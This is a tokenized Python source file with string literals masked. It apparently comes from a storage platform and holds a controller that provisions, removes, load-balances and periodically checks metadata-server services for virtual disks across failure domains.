'<STR_LIT>' ) <EOL> storagerouterclient . Logger . setupLogging ( LogHandler . load_path ( '<STR_LIT>' ) ) <EOL> storagerouterclient . Logger . enableLogging ( ) <EOL> class MDSServiceController ( object ) : <EOL> """<STR_LIT>""" <EOL> @ staticmethod <EOL> def prepare_mds_service ( storagerouter , vpool , fresh_only , reload_config ) : <EOL> """<STR_LIT>""" <EOL> service_number = - <NUM_LIT:1> <EOL> for mds_service in vpool . mds_services : <EOL> if mds_service . service . storagerouter_guid == storagerouter . guid : <EOL> service_number = max ( mds_service . number , service_number ) <EOL> if fresh_only is True and service_number >= <NUM_LIT:0> : <EOL> return <EOL> client = SSHClient ( storagerouter ) <EOL> mdsservice_type = ServiceTypeList . get_by_name ( ServiceType . SERVICE_TYPES . MD_SERVER ) <EOL> occupied_ports = [ ] <EOL> for service in mdsservice_type . services : <EOL> if service . storagerouter_guid == storagerouter . guid : <EOL> occupied_ports . extend ( service . ports ) <EOL> mds_port_range = EtcdConfiguration . get ( '<STR_LIT>' . format ( System . get_my_machine_id ( client ) ) ) <EOL> free_ports = System . get_free_ports ( selected_range = mds_port_range , <EOL> exclude = occupied_ports , <EOL> nr = <NUM_LIT:1> , <EOL> client = client ) <EOL> if not free_ports : <EOL> raise RuntimeError ( '<STR_LIT>' . format ( storagerouter . name , mds_port_range ) ) <EOL> db_partition = None <EOL> for disk in storagerouter . disks : <EOL> for partition in disk . partitions : <EOL> if DiskPartition . ROLES . DB in partition . roles : <EOL> db_partition = partition <EOL> break <EOL> if db_partition is None : <EOL> raise RuntimeError ( '<STR_LIT>' . format ( storagerouter . name ) ) <EOL> storagedrivers = [ sd for sd in vpool . storagedrivers if sd . storagerouter_guid == storagerouter . guid ] <EOL> if not storagedrivers : <EOL> raise RuntimeError ( '<STR_LIT>' . format ( vpool . name , storagerouter . name ) ) <EOL> storagedriver = storagedrivers [ <NUM_LIT:0> ] <EOL> service_number += <NUM_LIT:1> <EOL> service = Service ( ) <EOL> service . name = '<STR_LIT>' . format ( vpool . name , service_number ) <EOL> service . type = mdsservice_type <EOL> service . ports = [ free_ports [ <NUM_LIT:0> ] ] <EOL> service . storagerouter = storagerouter <EOL> service . save ( ) <EOL> mds_service = MDSService ( ) <EOL> mds_service . vpool = vpool <EOL> mds_service . number = service_number <EOL> mds_service . service = service <EOL> mds_service . save ( ) <EOL> from ovs . lib . storagedriver import StorageDriverController <EOL> sdp = StorageDriverController . add_storagedriverpartition ( storagedriver , { '<STR_LIT:size>' : None , <EOL> '<STR_LIT>' : DiskPartition . ROLES . DB , <EOL> '<STR_LIT>' : StorageDriverPartition . SUBROLE . MDS , <EOL> '<STR_LIT>' : db_partition , <EOL> '<STR_LIT>' : mds_service } ) <EOL> mds_nodes = [ ] <EOL> for service in mdsservice_type . services : <EOL> if service . storagerouter_guid == storagerouter . guid : <EOL> mds_service = service . mds_service <EOL> if mds_service is not None : <EOL> if mds_service . vpool_guid == vpool . guid : <EOL> mds_nodes . append ( { '<STR_LIT:host>' : service . storagerouter . ip , <EOL> '<STR_LIT:port>' : service . ports [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : sdp . path , <EOL> '<STR_LIT>' : sdp . path } ) <EOL> storagedriver_config = StorageDriverConfiguration ( '<STR_LIT>' , vpool . guid , storagedriver . storagedriver_id ) <EOL> storagedriver_config . load ( ) <EOL> storagedriver_config . clean ( ) <EOL> storagedriver_config . configure_metadata_server ( mds_nodes = mds_nodes ) <EOL> storagedriver_config . save ( client , reload_config = reload_config ) <EOL> return mds_service <EOL> @ staticmethod <EOL> def remove_mds_service ( mds_service , vpool , reconfigure , allow_offline = False ) : <EOL> """<STR_LIT>""" <EOL> if len ( mds_service . vdisks_guids ) > <NUM_LIT:0> and allow_offline is False : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> mdsservice_type = ServiceTypeList . get_by_name ( ServiceType . SERVICE_TYPES . MD_SERVER ) <EOL> directories_to_clean = [ ] <EOL> for sd_partition in mds_service . storagedriver_partitions : <EOL> directories_to_clean . append ( sd_partition . path ) <EOL> sd_partition . delete ( ) <EOL> if allow_offline is True : <EOL> for junction in mds_service . vdisks : <EOL> junction . delete ( ) <EOL> mds_service . delete ( ) <EOL> mds_service . service . delete ( ) <EOL> storagerouter = mds_service . service . storagerouter <EOL> try : <EOL> client = SSHClient ( storagerouter ) <EOL> if reconfigure is True : <EOL> mds_nodes = [ ] <EOL> for service in mdsservice_type . services : <EOL> if service . storagerouter_guid == storagerouter . guid : <EOL> mds_service = service . mds_service <EOL> if mds_service . vpool_guid == vpool . guid : <EOL> sdp = [ sd_partition . path for sd_partition in mds_service . storagedriver_partitions if sd_partition . role == DiskPartition . ROLES . DB ] <EOL> mds_nodes . append ( { '<STR_LIT:host>' : service . storagerouter . ip , <EOL> '<STR_LIT:port>' : service . ports [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : sdp [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : sdp [ <NUM_LIT:0> ] } ) <EOL> storagedriver = [ sd for sd in storagerouter . storagedrivers if sd . vpool_guid == vpool . guid ] [ <NUM_LIT:0> ] <EOL> storagedriver_config = StorageDriverConfiguration ( '<STR_LIT>' , vpool . guid , storagedriver . storagedriver_id ) <EOL> storagedriver_config . load ( ) <EOL> storagedriver_config . clean ( ) <EOL> storagedriver_config . configure_metadata_server ( mds_nodes = mds_nodes ) <EOL> storagedriver_config . save ( client , reload_config = reconfigure ) <EOL> tries = <NUM_LIT:5> <EOL> while tries > <NUM_LIT:0> : <EOL> try : <EOL> root_client = SSHClient ( storagerouter , username = '<STR_LIT:root>' ) <EOL> root_client . dir_delete ( directories = directories_to_clean , <EOL> follow_symlinks = True ) <EOL> for dir_name in directories_to_clean : <EOL> logger . debug ( '<STR_LIT>' . format ( dir_name ) ) <EOL> break <EOL> except Exception : <EOL> logger . debug ( '<STR_LIT>' ) <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> tries -= <NUM_LIT:1> <EOL> if tries == <NUM_LIT:0> : <EOL> raise <EOL> except UnableToConnectException : <EOL> if allow_offline is True : <EOL> logger . info ( '<STR_LIT>' ) <EOL> else : <EOL> raise <EOL> @ staticmethod <EOL> def sync_vdisk_to_reality ( vdisk ) : <EOL> """<STR_LIT>""" <EOL> vdisk . reload_client ( ) <EOL> vdisk . invalidate_dynamics ( [ '<STR_LIT:info>' ] ) <EOL> config = vdisk . info [ '<STR_LIT>' ] <EOL> config_dict = { } <EOL> for item in config : <EOL> if item [ '<STR_LIT>' ] not in config_dict : <EOL> config_dict [ item [ '<STR_LIT>' ] ] = [ ] <EOL> config_dict [ item [ '<STR_LIT>' ] ] . append ( item [ '<STR_LIT:port>' ] ) <EOL> mds_dict = { } <EOL> for junction in vdisk . mds_services : <EOL> service = junction . mds_service . service <EOL> storagerouter = service . storagerouter <EOL> if config [ <NUM_LIT:0> ] [ '<STR_LIT>' ] == storagerouter . ip and config [ <NUM_LIT:0> ] [ '<STR_LIT:port>' ] == service . ports [ <NUM_LIT:0> ] : <EOL> junction . is_master = True <EOL> junction . save ( ) <EOL> if storagerouter . ip not in mds_dict : <EOL> mds_dict [ storagerouter . ip ] = [ ] <EOL> mds_dict [ storagerouter . ip ] . append ( service . ports [ <NUM_LIT:0> ] ) <EOL> elif storagerouter . ip in config_dict and service . ports [ <NUM_LIT:0> ] in config_dict [ storagerouter . ip ] : <EOL> junction . is_master = False <EOL> junction . save ( ) <EOL> if storagerouter . ip not in mds_dict : <EOL> mds_dict [ storagerouter . ip ] = [ ] <EOL> mds_dict [ storagerouter . ip ] . append ( service . ports [ <NUM_LIT:0> ] ) <EOL> else : <EOL> junction . delete ( ) <EOL> for ip , ports in config_dict . iteritems ( ) : <EOL> for port in ports : <EOL> if ip not in mds_dict or port not in mds_dict [ ip ] : <EOL> service = ServiceList . get_by_ip_ports ( ip , [ port ] ) <EOL> if service is not None : <EOL> mds_service_vdisk = MDSServiceVDisk ( ) <EOL> mds_service_vdisk . vdisk = vdisk <EOL> mds_service_vdisk . mds_service = service . mds_service <EOL> mds_service_vdisk . is_master = config [ <NUM_LIT:0> ] [ '<STR_LIT>' ] == service . storagerouter . ip and config [ <NUM_LIT:0> ] [ '<STR_LIT:port>' ] == service . ports [ <NUM_LIT:0> ] <EOL> mds_service_vdisk . save ( ) <EOL> @ staticmethod <EOL> def ensure_safety ( vdisk , excluded_storagerouters = None ) : <EOL> """<STR_LIT>""" <EOL> def _add_suitable_nodes ( local_failure_domain , local_safety ) : <EOL> if len ( nodes ) < local_safety : <EOL> for local_load in sorted ( failure_domain_load_dict [ local_failure_domain ] ) : <EOL> for local_service in failure_domain_load_dict [ local_failure_domain ] [ local_load ] : <EOL> if len ( nodes ) < local_safety and local_service . storagerouter . ip not in nodes : <EOL> try : <EOL> SSHClient ( local_service . storagerouter ) <EOL> new_services . append ( local_service ) <EOL> nodes . add ( local_service . storagerouter . ip ) <EOL> except UnableToConnectException : <EOL> logger . debug ( '<STR_LIT>' . format ( vdisk . guid , service . storagerouter . ip ) ) <EOL> return nodes , new_services <EOL> logger . debug ( '<STR_LIT>' . format ( vdisk . guid , vdisk . name ) ) <EOL> vdisk . reload_client ( ) <EOL> vdisk . invalidate_dynamics ( [ '<STR_LIT:info>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if vdisk . storagerouter_guid is None : <EOL> raise ValueError ( '<STR_LIT>' . format ( vdisk . name , vdisk . guid ) ) <EOL> if excluded_storagerouters is None : <EOL> excluded_storagerouters = [ ] <EOL> services = sorted ( [ mds_service . service for mds_service in vdisk . vpool . mds_services <EOL> if mds_service . service . storagerouter not in excluded_storagerouters ] , key = lambda k : k . ports ) <EOL> nodes = set ( service . storagerouter . ip for service in services ) <EOL> vdisk_storagerouter = StorageRouter ( vdisk . storagerouter_guid ) <EOL> primary_failure_domain = vdisk_storagerouter . primary_failure_domain <EOL> if vdisk . secondary_failure_domain is not None : <EOL> secondary_failure_domain = vdisk . secondary_failure_domain <EOL> else : <EOL> secondary_failure_domain = vdisk_storagerouter . secondary_failure_domain <EOL> failure_domain_load_dict = { primary_failure_domain : { } } <EOL> failure_domain_used_services_dict = { primary_failure_domain : [ ] } <EOL> failure_domain_available_services_dict = { primary_failure_domain : [ ] } <EOL> storage_router_failure_domain_dict = dict ( ( storage_router , primary_failure_domain ) for storage_router in primary_failure_domain . primary_storagerouters ) <EOL> if secondary_failure_domain is not None : <EOL> failure_domain_load_dict [ secondary_failure_domain ] = { } <EOL> failure_domain_used_services_dict [ secondary_failure_domain ] = [ ] <EOL> failure_domain_available_services_dict [ secondary_failure_domain ] = [ ] <EOL> storage_router_failure_domain_dict . update ( dict ( ( storage_router , secondary_failure_domain ) for storage_router in secondary_failure_domain . primary_storagerouters ) ) <EOL> services_load = { } <EOL> service_per_key = { } <EOL> for service in services : <EOL> services_load [ service ] = MDSServiceController . get_mds_load ( service . mds_service ) <EOL> service_per_key [ '<STR_LIT>' . format ( service . storagerouter . ip , service . ports [ <NUM_LIT:0> ] ) ] = service <EOL> configs = vdisk . info [ '<STR_LIT>' ] <EOL> for config in configs : <EOL> config [ '<STR_LIT:key>' ] = '<STR_LIT>' . format ( config [ '<STR_LIT>' ] , config [ '<STR_LIT:port>' ] ) <EOL> master_service = None <EOL> reconfigure_reasons = [ ] <EOL> if len ( configs ) > <NUM_LIT:0> : <EOL> config = configs . pop ( <NUM_LIT:0> ) <EOL> if config [ '<STR_LIT:key>' ] in service_per_key : <EOL> master_service = service_per_key . get ( config [ '<STR_LIT:key>' ] ) <EOL> else : <EOL> reconfigure_reasons . append ( '<STR_LIT>' . format ( config [ '<STR_LIT>' ] , config [ '<STR_LIT:port>' ] ) ) <EOL> slave_services = [ ] <EOL> for config in configs : <EOL> if config [ '<STR_LIT:key>' ] in service_per_key : <EOL> slave_services . append ( service_per_key [ config [ '<STR_LIT:key>' ] ] ) <EOL> else : <EOL> reconfigure_reasons . append ( '<STR_LIT>' . format ( config [ '<STR_LIT>' ] , config [ '<STR_LIT:port>' ] ) ) <EOL> tlogs = EtcdConfiguration . get ( '<STR_LIT>' ) <EOL> safety = EtcdConfiguration . get ( '<STR_LIT>' ) <EOL> max_load = EtcdConfiguration . get ( '<STR_LIT>' ) <EOL> for service in services : <EOL> if service == master_service or service in slave_services : <EOL> load = services_load [ service ] [ <NUM_LIT:0> ] <EOL> if service . storagerouter in storage_router_failure_domain_dict : <EOL> failure_domain_used_services_dict [ storage_router_failure_domain_dict [ service . storagerouter ] ] . append ( service ) <EOL> else : <EOL> reconfigure_reasons . append ( '<STR_LIT>' . format ( service . name , service . storagerouter . ip ) ) <EOL> else : <EOL> load = services_load [ service ] [ <NUM_LIT:1> ] <EOL> services_load [ service ] = load <EOL> if service . storagerouter in storage_router_failure_domain_dict : <EOL> failure_domain = storage_router_failure_domain_dict [ service . storagerouter ] <EOL> failure_domain_available_services_dict [ failure_domain ] . append ( service ) <EOL> if load <= max_load : <EOL> if load not in failure_domain_load_dict [ failure_domain ] : <EOL> failure_domain_load_dict [ failure_domain ] [ load ] = [ ] <EOL> failure_domain_load_dict [ failure_domain ] [ load ] . append ( service ) <EOL> service_nodes = [ ] <EOL> if master_service is not None : <EOL> service_nodes . append ( master_service . storagerouter . ip ) <EOL> for service in slave_services : <EOL> ip = service . storagerouter . ip <EOL> if ip in service_nodes : <EOL> reconfigure_reasons . append ( '<STR_LIT>' ) <EOL> else : <EOL> service_nodes . append ( ip ) <EOL> if len ( service_nodes ) > safety : <EOL> reconfigure_reasons . append ( '<STR_LIT>' ) <EOL> if len ( service_nodes ) < safety and len ( service_nodes ) < len ( nodes ) : <EOL> reconfigure_reasons . append ( '<STR_LIT>' ) <EOL> if master_service is not None and services_load [ master_service ] > max_load : <EOL> reconfigure_reasons . append ( '<STR_LIT>' ) <EOL> if master_service is not None and master_service . storagerouter_guid != vdisk . storagerouter_guid : <EOL> reconfigure_reasons . append ( '<STR_LIT>' ) <EOL> if any ( service for service in slave_services if services_load [ service ] > max_load ) : <EOL> reconfigure_reasons . append ( '<STR_LIT>' ) <EOL> recommended_primary = math . ceil ( safety / <NUM_LIT> ) if secondary_failure_domain is not None else safety <EOL> recommended_secondary = safety - recommended_primary <EOL> if master_service is not None and master_service not in failure_domain_used_services_dict [ primary_failure_domain ] : <EOL> reconfigure_reasons . append ( '<STR_LIT>' ) <EOL> primary_services_used = len ( failure_domain_used_services_dict [ primary_failure_domain ] ) <EOL> primary_services_available = len ( failure_domain_available_services_dict [ primary_failure_domain ] ) <EOL> if primary_services_used < recommended_primary and primary_services_used < primary_services_available : <EOL> reconfigure_reasons . append ( '<STR_LIT>' ) <EOL> if secondary_failure_domain is not None : <EOL> secondary_services_used = len ( failure_domain_used_services_dict [ secondary_failure_domain ] ) <EOL> secondary_services_available = len ( failure_domain_available_services_dict [ secondary_failure_domain ] ) <EOL> if secondary_services_used < recommended_secondary and secondary_services_used < secondary_services_available : <EOL> reconfigure_reasons . append ( '<STR_LIT>' ) <EOL> secondary = False <EOL> for slave_service in slave_services : <EOL> if secondary is True and slave_service in failure_domain_used_services_dict [ primary_failure_domain ] : <EOL> reconfigure_reasons . append ( '<STR_LIT>' ) <EOL> break <EOL> if slave_service in failure_domain_used_services_dict [ secondary_failure_domain ] : <EOL> secondary = True <EOL> if not reconfigure_reasons : <EOL> logger . debug ( '<STR_LIT>' . format ( vdisk . guid ) ) <EOL> MDSServiceController . sync_vdisk_to_reality ( vdisk ) <EOL> return <EOL> logger . debug ( '<STR_LIT>' . format ( vdisk . guid ) ) <EOL> for reason in reconfigure_reasons : <EOL> logger . debug ( '<STR_LIT>' . format ( vdisk . guid , reason ) ) <EOL> new_services = [ ] <EOL> master_ok = master_service is not None <EOL> if master_ok is True : <EOL> master_ok = master_service . storagerouter_guid == vdisk . storagerouter_guid and services_load [ master_service ] <= max_load <EOL> if master_ok : <EOL> new_services . append ( master_service ) <EOL> else : <EOL> candidate_master_service = None <EOL> candidate_master_load = <NUM_LIT:0> <EOL> local_mds = None <EOL> local_mds_load = <NUM_LIT:0> <EOL> for service in failure_domain_available_services_dict [ primary_failure_domain ] : <EOL> load = services_load [ service ] <EOL> if load <= max_load and service . storagerouter_guid == vdisk . storagerouter_guid : <EOL> if local_mds is None or local_mds_load > load : <EOL> local_mds = service <EOL> local_mds_load = load <EOL> if service in slave_services : <EOL> if candidate_master_service is None or candidate_master_load > load : <EOL> candidate_master_service = service <EOL> candidate_master_load = load <EOL> if candidate_master_service is not None : <EOL> client = MetadataServerClient . load ( candidate_master_service ) <EOL> try : <EOL> amount_of_tlogs = client . catch_up ( str ( vdisk . volume_id ) , True ) <EOL> except RuntimeError as ex : <EOL> if '<STR_LIT>' in ex . message : <EOL> client . create_namespace ( str ( vdisk . volume_id ) ) <EOL> amount_of_tlogs = client . catch_up ( str ( vdisk . volume_id ) , True ) <EOL> else : <EOL> raise <EOL> if amount_of_tlogs < tlogs : <EOL> start = time . time ( ) <EOL> client . catch_up ( str ( vdisk . volume_id ) , False ) <EOL> logger . debug ( '<STR_LIT>' . format ( vdisk . guid , round ( time . time ( ) - start , <NUM_LIT:2> ) ) ) <EOL> new_services . append ( candidate_master_service ) <EOL> if master_service is not None : <EOL> slave_services . append ( master_service ) <EOL> else : <EOL> if master_service is not None : <EOL> new_services . append ( master_service ) <EOL> new_services . append ( candidate_master_service ) <EOL> if candidate_master_service in slave_services : <EOL> slave_services . remove ( candidate_master_service ) <EOL> else : <EOL> if master_service is not None : <EOL> new_services . append ( master_service ) <EOL> if local_mds is not None : <EOL> new_services . append ( local_mds ) <EOL> if local_mds in slave_services : <EOL> slave_services . remove ( local_mds ) <EOL> nodes = set ( service . storagerouter . ip for service in new_services ) <EOL> secondary_node_count = <NUM_LIT:0> <EOL> service_to_recycle = None <EOL> if len ( nodes ) < safety : <EOL> if recommended_primary > <NUM_LIT:1> : <EOL> for load in sorted ( failure_domain_load_dict [ primary_failure_domain ] ) : <EOL> for service in failure_domain_load_dict [ primary_failure_domain ] [ load ] : <EOL> if service_to_recycle is None and service in slave_services and service . storagerouter . ip not in nodes : <EOL> try : <EOL> SSHClient ( service . storagerouter ) <EOL> service_to_recycle = service <EOL> except UnableToConnectException : <EOL> logger . debug ( '<STR_LIT>' . format ( vdisk . guid , service . storagerouter . ip ) ) <EOL> if service_to_recycle is None and secondary_failure_domain is not None : <EOL> for load in sorted ( failure_domain_load_dict [ secondary_failure_domain ] ) : <EOL> for service in failure_domain_load_dict [ secondary_failure_domain ] [ load ] : <EOL> if service_to_recycle is None and service in slave_services and service . storagerouter . ip not in nodes : <EOL> try : <EOL> SSHClient ( service . storagerouter ) <EOL> service_to_recycle = service <EOL> secondary_node_count = <NUM_LIT:1> <EOL> except UnableToConnectException : <EOL> logger . debug ( '<STR_LIT>' . format ( vdisk . guid , service . storagerouter . ip ) ) <EOL> if service_to_recycle is not None : <EOL> slave_services . remove ( service_to_recycle ) <EOL> if secondary_node_count == <NUM_LIT:0> : <EOL> new_services . append ( service_to_recycle ) <EOL> nodes . add ( service_to_recycle . storagerouter . ip ) <EOL> nodes , new_services = _add_suitable_nodes ( local_failure_domain = primary_failure_domain , <EOL> local_safety = recommended_primary ) <EOL> if secondary_node_count == <NUM_LIT:1> : <EOL> new_services . append ( service_to_recycle ) <EOL> nodes . add ( service_to_recycle . storagerouter . ip ) <EOL> if secondary_failure_domain is not None : <EOL> nodes , new_services = _add_suitable_nodes ( local_failure_domain = secondary_failure_domain , <EOL> local_safety = safety ) <EOL> if len ( nodes ) < safety : <EOL> nodes , new_services = _add_suitable_nodes ( local_failure_domain = primary_failure_domain , <EOL> local_safety = safety ) <EOL> configs = [ ] <EOL> for service in new_services : <EOL> client = MetadataServerClient . load ( service ) <EOL> client . create_namespace ( str ( vdisk . volume_id ) ) <EOL> configs . append ( MDSNodeConfig ( address = str ( service . storagerouter . ip ) , <EOL> port = service . ports [ <NUM_LIT:0> ] ) ) <EOL> vdisk . storagedriver_client . update_metadata_backend_config ( volume_id = str ( vdisk . volume_id ) , <EOL> metadata_backend_config = MDSMetaDataBackendConfig ( configs ) ) <EOL> MDSServiceController . sync_vdisk_to_reality ( vdisk ) <EOL> logger . debug ( '<STR_LIT>' . format ( vdisk . guid ) ) <EOL> @ staticmethod <EOL> def get_preferred_mds ( storagerouter , vpool ) : <EOL> """<STR_LIT>""" <EOL> mds_service = ( None , float ( '<STR_LIT>' ) ) <EOL> for current_mds_service in vpool . mds_services : <EOL> if current_mds_service . service . storagerouter_guid == storagerouter . guid : <EOL> load = MDSServiceController . get_mds_load ( current_mds_service ) [ <NUM_LIT:0> ] <EOL> if mds_service is None or load < mds_service [ <NUM_LIT:1> ] : <EOL> mds_service = ( current_mds_service , load ) <EOL> return mds_service <EOL> @ staticmethod <EOL> def get_mds_load ( mds_service ) : <EOL> """<STR_LIT>""" <EOL> service_capacity = float ( mds_service . capacity ) <EOL> if service_capacity < <NUM_LIT:0> : <EOL> return <NUM_LIT:50> , <NUM_LIT:50> <EOL> if service_capacity == <NUM_LIT:0> : <EOL> return float ( '<STR_LIT>' ) , float ( '<STR_LIT>' ) <EOL> usage = len ( mds_service . vdisks_guids ) <EOL> return round ( usage / service_capacity * <NUM_LIT> , <NUM_LIT:5> ) , round ( ( usage + <NUM_LIT:1> ) / service_capacity * <NUM_LIT> , <NUM_LIT:5> ) <EOL> @ staticmethod <EOL> def get_mds_storagedriver_config_set ( vpool , check_online = False ) : <EOL> """<STR_LIT>""" <EOL> mds_per_storagerouter = { } <EOL> mds_per_load = { } <EOL> for storagedriver in vpool . storagedrivers : <EOL> storagerouter = storagedriver . storagerouter <EOL> if check_online is True : <EOL> try : <EOL> client = SSHClient ( storagerouter ) <EOL> client . run ( '<STR_LIT>' ) <EOL> except UnableToConnectException : <EOL> continue <EOL> mds_service , load = MDSServiceController . get_preferred_mds ( storagerouter , vpool ) <EOL> if mds_service is None : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> mds_per_storagerouter [ storagerouter ] = { '<STR_LIT:host>' : storagerouter . ip , '<STR_LIT:port>' : mds_service . service . ports [ <NUM_LIT:0> ] } <EOL> if load not in mds_per_load : <EOL> mds_per_load [ load ] = [ ] <EOL> mds_per_load [ load ] . append ( storagerouter ) <EOL> safety = EtcdConfiguration . get ( '<STR_LIT>' ) <EOL> config_set = { } <EOL> for storagerouter , ip_info in mds_per_storagerouter . iteritems ( ) : <EOL> primary_failure_domain = storagerouter . primary_failure_domain <EOL> secondary_failure_domain = storagerouter . secondary_failure_domain <EOL> config_set [ storagerouter . guid ] = [ ip_info ] <EOL> for load in sorted ( mds_per_load ) : <EOL> if len ( config_set [ storagerouter . guid ] ) >= safety : <EOL> break <EOL> other_storagerouters = mds_per_load [ load ] <EOL> random . shuffle ( other_storagerouters ) <EOL> for other_storagerouter in other_storagerouters : <EOL> if len ( config_set [ storagerouter . guid ] ) >= safety : <EOL> break <EOL> if other_storagerouter != storagerouter and other_storagerouter in primary_failure_domain . primary_storagerouters : <EOL> config_set [ storagerouter . guid ] . append ( mds_per_storagerouter [ other_storagerouter ] ) <EOL> if secondary_failure_domain is not None : <EOL> for load in sorted ( mds_per_load ) : <EOL> if len ( config_set [ storagerouter . guid ] ) >= safety : <EOL> break <EOL> other_storagerouters = mds_per_load [ load ] <EOL> random . shuffle ( other_storagerouters ) <EOL> for other_storagerouter in other_storagerouters : <EOL> if len ( config_set [ storagerouter . guid ] ) >= safety : <EOL> break <EOL> if other_storagerouter != storagerouter and other_storagerouter in secondary_failure_domain . primary_storagerouters : <EOL> config_set [ storagerouter . guid ] . append ( mds_per_storagerouter [ other_storagerouter ] ) <EOL> return config_set <EOL> @ staticmethod <EOL> @ celery . task ( name = '<STR_LIT>' , schedule = crontab ( minute = '<STR_LIT>' , hour = '<STR_LIT>' ) ) <EOL> @ ensure_single ( task_name = '<STR_LIT>' , mode = '<STR_LIT>' ) <EOL> def mds_checkup ( ) : <EOL> """<STR_LIT>""" <EOL> logger . info ( '<STR_LIT>' ) <EOL> mds_dict = { } <EOL> for vpool in VPoolList . get_vpools ( ) : <EOL> logger . info ( '<STR_LIT>' . format ( vpool . name ) ) <EOL> mds_dict [ vpool ] = { } <EOL> for mds_service in vpool . mds_services : <EOL> storagerouter = mds_service . service . storagerouter <EOL> if storagerouter not in mds_dict [ vpool ] : <EOL> mds_dict [ vpool ] [ storagerouter ] = { '<STR_LIT>' : None , <EOL> '<STR_LIT>' : [ ] } <EOL> try : <EOL> client = SSHClient ( storagerouter , username = '<STR_LIT:root>' ) <EOL> client . run ( '<STR_LIT>' ) <EOL> mds_dict [ vpool ] [ storagerouter ] [ '<STR_LIT>' ] = client <EOL> logger . info ( '<STR_LIT>' . format ( vpool . name , storagerouter . name ) ) <EOL> except UnableToConnectException : <EOL> logger . info ( '<STR_LIT>' . format ( vpool . name , storagerouter . name ) ) <EOL> mds_dict [ vpool ] [ storagerouter ] [ '<STR_LIT>' ] . append ( mds_service ) <EOL> failures = [ ] <EOL> max_load = EtcdConfiguration . get ( '<STR_LIT>' ) <EOL> for vpool , storagerouter_info in mds_dict . iteritems ( ) : <EOL> for storagerouter in storagerouter_info : <EOL> client = mds_dict [ vpool ] [ storagerouter ] [ '<STR_LIT>' ] <EOL> mds_services = mds_dict [ vpool ] [ storagerouter ] [ '<STR_LIT>' ] <EOL> has_room = False <EOL> for mds_service in mds_services [ : ] : <EOL> if mds_service . capacity == <NUM_LIT:0> and len ( mds_service . vdisks_guids ) == <NUM_LIT:0> : <EOL> logger . info ( '<STR_LIT>' . format ( mds_service . number , vpool . name ) ) <EOL> MDSServiceController . remove_mds_service ( mds_service , vpool , reconfigure = True , allow_offline = client is None ) <EOL> mds_services . remove ( mds_service ) <EOL> for mds_service in mds_services : <EOL> _ , load = MDSServiceController . get_mds_load ( mds_service ) <EOL> if load < max_load : <EOL> has_room = True <EOL> break <EOL> logger . info ( '<STR_LIT>' . format ( vpool . name , storagerouter . name , has_room ) ) <EOL> if has_room is False and client is not None : <EOL> mds_service = MDSServiceController . prepare_mds_service ( storagerouter = storagerouter , <EOL> vpool = vpool , <EOL> fresh_only = False , <EOL> reload_config = True ) <EOL> if mds_service is None : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> mds_services . append ( mds_service ) <EOL> mds_config_set = MDSServiceController . get_mds_storagedriver_config_set ( vpool , True ) <EOL> for storagerouter in storagerouter_info : <EOL> client = mds_dict [ vpool ] [ storagerouter ] [ '<STR_LIT>' ] <EOL> if client is None : <EOL> logger . info ( '<STR_LIT>' . format ( vpool . name , storagerouter . name ) ) <EOL> continue <EOL> storagedriver = [ sd for sd in storagerouter . storagedrivers if sd . vpool_guid == vpool . guid ] [ <NUM_LIT:0> ] <EOL> storagedriver_config = StorageDriverConfiguration ( '<STR_LIT>' , vpool . guid , storagedriver . storagedriver_id ) <EOL> storagedriver_config . load ( ) <EOL> if storagedriver_config . is_new is False : <EOL> logger . info ( '<STR_LIT>' . format ( vpool . name , storagerouter . name , mds_config_set [ storagerouter . guid ] ) ) <EOL> storagedriver_config . clean ( ) <EOL> storagedriver_config . configure_filesystem ( fs_metadata_backend_mds_nodes = mds_config_set [ storagerouter . guid ] ) <EOL> storagedriver_config . save ( client ) <EOL> logger . info ( '<STR_LIT>' . format ( vpool . name ) ) <EOL> for vdisk in vpool . vdisks : <EOL> try : <EOL> MDSServiceController . ensure_safety ( vdisk ) <EOL> except Exception as ex : <EOL> failures . append ( '<STR_LIT>' . format ( vdisk . name , vdisk . guid , ex ) ) <EOL> if len ( failures ) > <NUM_LIT:0> : <EOL> raise Exception ( '<STR_LIT>' + '<STR_LIT>' . join ( failures ) ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from ovs . dal . lists . storagerouterlist import StorageRouterList <EOL> try : <EOL> while True : <EOL> output = [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' . format ( time . time ( ) ) , <EOL> '<STR_LIT>' ] <EOL> for _sr in StorageRouterList . get_storagerouters ( ) : <EOL> output . append ( '<STR_LIT>' . format ( _sr . name , _sr . ip ) ) <EOL> vpools = set ( sd . vpool for sd in _sr . storagedrivers ) <EOL> for _vpool in vpools : <EOL> output . append ( '<STR_LIT>' . format ( _vpool . name ) ) <EOL> for _mds_service in _vpool . mds_services : <EOL> if _mds_service . service . storagerouter_guid == _sr . guid : <EOL> masters , slaves = <NUM_LIT:0> , <NUM_LIT:0> <EOL> for _junction in _mds_service . vdisks : <EOL> if _junction . is_master : <EOL> masters += <NUM_LIT:1> <EOL> else : <EOL> slaves += <NUM_LIT:1> <EOL> capacity = _mds_service . capacity <EOL> if capacity == - <NUM_LIT:1> : <EOL> capacity = '<STR_LIT>' <EOL> _load , _ = MDSServiceController . get_mds_load ( _mds_service ) <EOL> if _load == float ( '<STR_LIT>' ) : <EOL> _load = '<STR_LIT>' <EOL> else : <EOL> _load = '<STR_LIT>' . format ( round ( _load , <NUM_LIT:2> ) ) <EOL> output . append ( '<STR_LIT>' . format ( <EOL> _mds_service . number , _mds_service . service . ports [ <NUM_LIT:0> ] , masters , slaves , capacity , _load <EOL> ) ) <EOL> output += [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> print '<STR_LIT>' + '<STR_LIT:\n>' . join ( output ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> except KeyboardInterrupt : <EOL> pass </s>
